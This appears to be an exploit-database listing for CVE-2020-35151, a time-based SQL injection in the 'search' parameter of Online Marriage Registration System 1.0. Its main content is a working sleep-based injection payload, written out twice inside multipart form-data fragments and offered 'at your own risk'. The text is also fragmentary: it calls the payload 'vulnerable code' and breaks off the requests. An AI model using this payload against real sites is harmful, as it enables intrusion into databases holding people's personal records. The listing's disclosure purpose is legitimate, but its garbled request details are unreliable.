Online marriage registration system 1.0 searchdata sql injection Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2020-12-21 |
Type : webapps |
Platform : php
This exploit / vulnerability Online marriage registration system 1.0 searchdata sql injection is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Online Marriage Registration System 1.0 - 'searchdata' SQL Injection
# Date: 12-21-2020
# Exploit Authors: Andrea Bruschi, Raffaele Sabato
# Vendor: Phpgurukul
# Product Web Page: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
# Version: 1.0
# CVE: CVE-2020-35151
I DESCRIPTION
========================================================================
A Time Based SQL Injection vulnerability was discovered in Online Marriage Registration System 1.0, in omrs/user/search.php and in omsr/admin/search.php. The request is authenticated but it is possible to register a new user account.
Following the vulnerable code:
' and (select 1 from (select(sleep(5)))a) and 'a'='a
-----------------------------197361427118054779422510078884
Content-Disposition: form-data; name="search"
' and (select 1 from (select(sleep(5)))a) and 'a'='a
-----------------------------267799269040335247322746025522
Content-Disposition: form-data; name="search"